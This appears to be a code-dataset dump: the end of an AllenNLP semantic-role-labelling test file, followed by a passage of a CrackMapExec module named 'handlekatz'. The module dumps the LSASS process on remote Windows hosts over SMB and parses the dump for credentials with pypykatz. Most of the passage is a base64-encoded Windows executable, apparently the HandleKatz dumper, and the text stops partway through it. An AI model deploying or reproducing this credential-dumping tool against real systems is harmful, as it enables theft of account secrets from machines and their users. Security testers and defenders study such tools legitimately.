assert fields["tags"].labels == ['O', 'O', 'O', 'O', 'O', 'O', 'O', 'O', 'O', 'O', 'O', 'B-V', 'O']
assert fields["metadata"].metadata["words"] == tokens
assert fields["metadata"].metadata["verb"] == tokens[11]
assert fields["metadata"].metadata["gold_tags"] == fields["tags"].labels
# Tests a sentence with no verbal predicates.
fields = instances[4].fields
tokens = [t.text for t in fields['tokens'].tokens]
assert tokens == ["Denise", "Dillon", "Headline", "News", "."]
assert fields["verb_indicator"].labels == [0, 0, 0, 0, 0]
assert fields["tags"].labels == ['O', 'O', 'O', 'O', 'O']
assert fields["metadata"].metadata["words"] == tokens
assert fields["metadata"].metadata["verb"] is None
assert fields["metadata"].metadata["gold_tags"] == fields["tags"].labels
def test_srl_reader_can_filter_by_domain(self):
conll_reader = SrlReader(domain_identifier="subdomain2")
instances = conll_reader.read(AllenNlpTestCase.FIXTURES_ROOT / 'conll_2012')
instances = ensure_list(instances)
# If we'd included the folder, we'd have 9 instances.
assert len(instances) == 2
| 55.723684 | 107 | 0.568123 | 496 | 4,235 | 4.782258 | 0.241935 | 0.126476 | 0.126476 | 0.177066 | 0.733558 | 0.720067 | 0.712901 | 0.712901 | 0.704469 | 0.528668 | 0 | 0.016506 | 0.241795 | 4,235 | 75 | 108 | 56.466667 | 0.722205 | 0.032113 | 0 | 0.396825 | 0 | 0 | 0.211966 | 0 | 0 | 0 | 0 | 0 | 0.492063 | 1 | 0.031746 | false | 0 | 0.063492 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
1659ca2dd53d1ac61a5723336e462a72726f252d | 89,237 | py | Python | cme/modules/handlekatz.py | justinforbes/CrackMapExec | 7b8473a82dbf3b5268f80451ff516c31fac1eaed | [
"BSD-2-Clause"
] | null | null | null | cme/modules/handlekatz.py | justinforbes/CrackMapExec | 7b8473a82dbf3b5268f80451ff516c31fac1eaed | [
"BSD-2-Clause"
] | null | null | null | cme/modules/handlekatz.py | justinforbes/CrackMapExec | 7b8473a82dbf3b5268f80451ff516c31fac1eaed | [
"BSD-2-Clause"
] | null | null | null | # handlekatz module for CME python3
# author of the module : github.com/mpgn
# HandleKatz: https://github.com/codewhitesec/HandleKatz
from io import StringIO
import os
import sys
import re
import time
import base64
class CMEModule:
name = 'handlekatz'
description = "Get lsass dump using handlekatz64 and parse the result with pypykatz"
supported_protocols = ['smb']
opsec_safe = True # not really
multiple_hosts = True
def options(self, context, module_options):
'''
TMP_DIR Path where process dump should be saved on target system (default: C:\\Windows\\Temp\\)
HANDLEKATZ_PATH Path where handlekatz.exe is on your system (default: /tmp/shared/)
HANDLEKATZ_EXE_NAME Name of the handlekatz executable (default: handlekatz.exe)
DIR_RESULT Location where the dmp are stored (default: DIR_RESULT = HANDLEKATZ_PATH)
'''
self.tmp_dir = "C:\\Windows\\Temp\\"
self.share = "C$"
self.tmp_share = self.tmp_dir.split(":")[1]
self.handlekatz_embeded = base64.b64decode("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